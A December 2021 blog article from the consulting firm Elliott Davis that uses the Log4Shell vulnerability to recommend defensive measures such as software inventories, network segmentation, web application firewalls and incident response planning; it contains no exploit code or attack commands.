Article
|
December 15, 2021
|
No items found.

Things to consider in the wake of the Log4Shell vulnerability

No items found.

CVE-2021-44228 – aka Log4Shell is a critical zero-day vulnerability that requires immediate action to address for all businesses and individuals. After it was announced on December 9th, 2021 – IT teams have sprung into action to address this real threat that exposes organizations and end-users to bad-actors’ attacks. Teams need to either patch or mitigate an attacker’s ability to execute code right now.

Focusing on the post-mortem of this event, let’s consider a few items that may have helped or may mitigate similar issues in the future:

  • Complete and accurate software inventory – Having a complete listing of software, including the library dependencies, would have helped organizations accurately triage and address this vulnerability. Many enterprise tools are written on shared libraries similar to Log4j. Having analyzed and determined what tools are available may have helped triage the response from the team. Many teams were scrambling to identify if they were impacted which could have been addressed with an up-to-date inventory before the event.
  • Network segmentation – Properly segmenting the network, including the utilization of a network demilitarized zone (DMZ), is crucial to contain the impact of a compromised host. If an impacted host has direct access from the internet to the internal network – an attacker will easily move throughout the organization instead of being constrained to a DMZ. 
  • Web Application Firewall – The attack path for the Log4j vulnerability highlights the capability of a Web Application Firewall which could mitigate this type of attack. A Web application firewall would require secure sockets layer (SSL) decryption to be effective.
  • Decommissioning of legacy systems – Shutting down legacy systems and closing unnecessary ports is crucial for reducing the attack surface for an organization. Organizations tend to forget systems that may no longer have a business need. Such systems should be shutdown.
  • Incident response planning – Preparing for an incident, including having a formalized plan that’s tested and rehearsed, is an important initial step. Scrambling to address issues while they are happening can be chaotic and infective.
  • System and application threat modeling – In depth threat modeling, including the considerations of supply chain attacks, should be included into the System/Software Development Lifecycle. Evaluating in-depth risk potential would assist organizations in understand their attack surface and help mitigate attack impacts.

If your organization needs assistance with this issue or planning for the next event; please do not hesitate in contacting the Elliott Davis Cyber Team.

The information provided in this communication is of a general nature and should not be considered professional advice.  You should not act upon the information provided without obtaining specific professional advice. The information above is subject to change.

“Elliott Davis" is the brand name under which Elliott Davis, LLC (doing business in North Carolina and D.C. as Elliott Davis, PLLC) and Elliott Davis Advisory, LLC and its subsidiary entities provide professional services. Elliott Davis, LLC and Elliott Davis Advisory, LLC and its subsidiary entities practice as an alternative practice structure in accordance with the AICPA Code of Professional Conduct and applicable law, regulations and professional standards. Elliott Davis, LLC is a licensed independent CPA firm that provides attest services to its customers. Elliott Davis Advisory, LLC and its subsidiary entities provide tax and business consulting services to their customers. Elliott Davis Advisory, LLC and its subsidiary entities are not licensed CPA firms. The entities falling under the Elliott Davis brand are each individual firms that are separate legal and independently owned entities and are not responsible or liable for the services and/or products provided by any other entity providing services and/or products under the Elliott Davis brand. Our use of the terms “our firm” and “we” and “us” and terms of similar import, denote the alternative practice structure conducted by Elliott Davis, LLC and Elliott Davis Advisory, LLC.

links and downloads.

Ready to find your business’ potential?

get in touch

download the white paper

contact our team

No items found.

contact our team.

contact our team.

meet the author

meet the team

meet the authors

No items found.